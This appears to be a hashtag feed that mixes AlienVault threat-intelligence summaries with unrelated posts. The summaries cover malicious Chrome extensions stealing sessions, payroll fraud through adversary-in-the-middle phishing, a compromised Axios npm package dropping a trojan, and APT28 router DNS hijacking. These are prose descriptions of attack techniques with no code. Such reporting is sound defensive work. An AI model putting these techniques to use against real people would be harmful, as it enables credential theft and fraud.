108 Chrome Extensions Linked to Data Exfiltration and Session Theft via Shared C2 Infrastructure

A coordinated campaign of 108 malicious Chrome extensions operated through shared command-and-control infrastructure at cloudapi[.]stream has been identified, collectively accounting for approximately 20,000 installations. The campaign spans multiple threat categories: 54 extensions steal Google account identities via OAuth2, one extension actively exfiltrates Telegram Web sessions every 15 seconds, and 45 extensions contain a universal backdoor enabling arbitrary URL execution on browser startup. Published under five distinct publisher identities (Yana Project, GameGen, SideGames, Rodeo Games, and InterAlt), these extensions masquerade as legitimate tools including Telegram sidebar clients, slot games, YouTube and TikTok enhancers, and translation utilities. All extensions route stolen credentials, user identities, and browsing data to servers controlled by the same operator, with infrastructure confirming a Malware-as-a-Service business model.

Pulse ID: 69de5f631a2f4bca81392ccd
Pulse Link: https://otx.alienvault.com/pulse/69de5f631a2f4bca81392ccd
Pulse Author: AlienVault
Created: 2026-04-14 15:38:11

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#BackDoor #Browser #Chrome #ChromeExtension #Cloud #CyberSecurity #Google #InfoSec #Malware #MalwareAsAService #OTX #OpenThreatExchange #RAT #Telegram #Troll #YouTube #bot #AlienVault

From VSN Newsroom New Lego video 4/9/26 #duet #iran #lego #legovideo #distrack #diss #legos #epstein #trump #troll

https://www.youtube.com/shorts/utCn2djo9lw

#news #left #resist #resistance #vsn #DiverseSpectrumOfTheLeft #SupportIndependentMedia

Payroll pirate attacks targeting Canadian employees

Microsoft Incident Response researchers identified Storm-2755, a financially motivated threat actor conducting payroll pirate attacks against Canadian users. The campaign uses malvertising and SEO poisoning on generic search terms like "Office 365" to lure victims to a fraudulent sign-in page. Through adversary-in-the-middle techniques, the actor captures authentication tokens and session cookies, bypassing MFA protections. Storm-2755 maintains persistence using Axios HTTP client to replay stolen tokens, then conducts discovery for payroll and HR contacts. The actor impersonates compromised users to socially engineer HR staff or directly manipulates payroll systems like Workday. Malicious inbox rules hide correspondence from victims. Attacks resulted in direct financial losses through redirected salary payments to attacker-controlled bank accounts.

Pulse ID: 69d80c2c976a9ec209e19217
Pulse Link: https://otx.alienvault.com/pulse/69d80c2c976a9ec209e19217
Pulse Author: AlienVault
Created: 2026-04-09 20:29:32

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#AdversaryInTheMiddle #Bank #Canadian #Cookies #CyberSecurity #HTTP #InfoSec #MFA #Malvertising #Microsoft #OTX #Office #OpenThreatExchange #RAT #SEOPoisoning #Troll #bot #iOS #AlienVault

NPM Package Supply Chain Compromise Leads to RAT Deployment

A supply chain attack targeting the Axios npm package has been identified after threat actors compromised the npm account of the company's lead developer. Malicious versions ([email protected] and [email protected]) were published containing a hidden dependency that executed postinstall scripts during npm installation. This automated execution downloaded and deployed a remote access trojan on affected systems without requiring user interaction, making it particularly dangerous for developer environments and CI/CD pipelines. The compromise resulted in full remote access capabilities, potential credential exposure including API keys and SSH keys, and possible insertion of malicious code into software builds. Detection platforms identified suspicious process execution chains involving npm spawning command interpreters and network utilities, followed by outbound connections to attacker-controlled infrastructure.

Pulse ID: 69d8b0c258b4fef5541358bb
Pulse Link: https://otx.alienvault.com/pulse/69d8b0c258b4fef5541358bb
Pulse Author: AlienVault
Created: 2026-04-10 08:11:46

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #InfoSec #NPM #OTX #OpenThreatExchange #RAT #RemoteAccessTrojan #SSH #SupplyChain #Trojan #Troll #bot #iOS #AlienVault

Per fortuna non sono Dio e nel dubbio taccio: 7 regole per non essere un #troll nemmeno per sbaglio.

Comunicare in modo civile non significa solo essere “educati”, ma creare uno spazio in cui le idee possano circolare senza ferire le persone.

Ecco un mini-decalogo (in realtà sono 7 regole) che cerco di seguire per non essere aggressivo

#vibes #lifestyle

https://taccuinodegliappunti.wordpress.com/2026/04/10/regole-comunicazione-non-aggressiva/?utm_source=mastodon&utm_medium=jetpack_social

What visual novel most resembles Disco Elysium?

#gameingTheory #troll #butReallyTho

APT28 exploit routers to enable DNS hijacking operations

Russian cyber actors APT28 have been exploiting routers to overwrite Dynamic Host Configuration Protocol (DHCP)/Domain Name System (DNS) settings to redirect traffic through attacker-controlled DNS servers. Resulting malicious DNS resolutions enable adversary-in-the-middle (AitM) attacks that harvest passwords, OAuth tokens and other credentials for web and email related services. This puts organisations at risk of credential theft, data manipulation and broader compromise.

Pulse ID: 69d50d4138f1353a9d14ce48
Pulse Link: https://otx.alienvault.com/pulse/69d50d4138f1353a9d14ce48
Pulse Author: AlienVault
Created: 2026-04-07 13:57:21

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#APT28 #AdversaryInTheMiddle #AitM #CyberSecurity #DNS #Email #InfoSec #OTX #OpenThreatExchange #Password #Passwords #RAT #Russia #Troll #Word #bot #AlienVault